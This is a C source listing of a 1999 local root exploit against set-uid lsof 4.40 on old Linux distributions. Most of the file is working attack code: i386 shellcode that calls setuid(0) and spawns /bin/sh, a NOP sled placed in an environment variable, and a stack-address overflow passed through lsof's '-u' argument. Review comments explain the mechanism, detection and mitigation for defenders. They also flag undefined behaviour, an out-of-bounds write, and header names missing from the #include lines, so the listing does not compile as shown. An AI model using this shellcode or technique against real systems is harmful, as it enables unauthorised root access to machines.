/*
 * ls0f.c (c) 1999 Subterrain Security
 * Written by bind - 1999
 *
 * Vulnerable: linux machines running lsof 4.40
 *
 * Cheers to xdr & cripto...
 *
 * *Affected*
 * [ SuSE 6.0 + 5.3 ]
 * [ Debian 2.0 ]
 * [ Redhat 5.2 ]
 *
 */

/*
 * NOTE(review): summary for defenders.
 *
 * What the listing does: it runs /usr/sbin/lsof with a crafted "-u"
 * argument and a large environment variable named CODE. The "-u" value is
 * a short run of repeated machine words, each a guessed stack address; the
 * environment variable is 0x90 padding followed by an i386 payload.
 * Presumably lsof 4.40 copies the "-u" value into a fixed-size stack
 * buffer without a length check -- the page does not show the vulnerable
 * code, so confirm against the lsof source or vendor advisory.
 *
 * Impact: this only matters where lsof is installed set-uid or set-gid
 * (assumed for the distributions listed above; verify per system). On a
 * system where lsof runs with the caller's own privileges there is no
 * privilege boundary to cross.
 *
 * Detection: an exec of lsof whose "-u" argument contains non-printable
 * bytes, together with an environment entry of roughly 2000 bytes that is
 * mostly 0x90, is not something a legitimate invocation produces.
 *
 * Mitigation: move off the lsof release named in the header (the fixed
 * version is not stated on this page), remove set-id bits from lsof where
 * they are not required, and rely on non-executable stack and address
 * randomisation, both of which break the fixed-address guess used here.
 */

/* NOTE(review): the header names after both #include directives are missing,
 * apparently lost when the page was extracted; as shown the file does not
 * compile. */
#include
#include

/* Absolute path of the target binary; passed to execl() below. */
#define LSOF "/usr/sbin/lsof"

/*
 * i386 Linux payload, stored as a byte string. It ends in the literal
 * "/bin/sh"; the leading bytes issue setuid(0) and the remainder is an
 * execve of that path followed by exit. The setuid call is what makes the
 * set-id question in the note above relevant.
 */
char shellcode[] =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Copies the stack pointer into %eax with inline assembly. There is no
 * return statement: the function depends on %eax being the i386 return
 * register, which is undefined behaviour as far as C is concerned and is
 * x86-32 only.
 */
unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

/*
 * Builds the two inputs described in the review note and replaces the
 * current process with lsof.
 *
 * argv[1] (optional): integer subtracted from this process's stack pointer
 * to form the address guess.
 *
 * NOTE(review): several statements below are undefined behaviour in C and
 * are flagged inline; the listing is not a sound program and should be read
 * as a historical artefact.
 */
int main(int argc, char **argv)
{
    char code[2000];   /* padding + payload, exported as the CODE variable */
    char ret[28];      /* repeated address guess, passed as the -u value */
    int offset, i;     /* offset is left uninitialised when argc <= 1 */
    int len = strlen(shellcode);

    if(argc > 1)
        offset = atoi(argv[1]);   /* atoi(): no error reporting on bad input */

    /* Fills ret with the same word. The bound is i <= 28, so the final store
     * at i == 28 lands past the end of the 28-byte array. */
    for(i = 0;i <= 28;i += 4)
        *(long *)&ret[i] = (unsigned long) get_sp() - offset;

    /* 0x90 is the one-byte x86 NOP; the payload occupies the tail of the
     * buffer. Nothing here writes a terminating NUL into code[]. */
    memset(code, 0x90, 2000);
    memcpy(code+(2000 - len), shellcode, len);

    /* The environment is inherited across execl(), so the buffer ends up in
     * the target process's address space. Return values are not checked. */
    setenv("CODE", code, 1);
    execl(LSOF,"lsof","-u",ret,NULL);
}
/* www.hack.co.za [2000]*/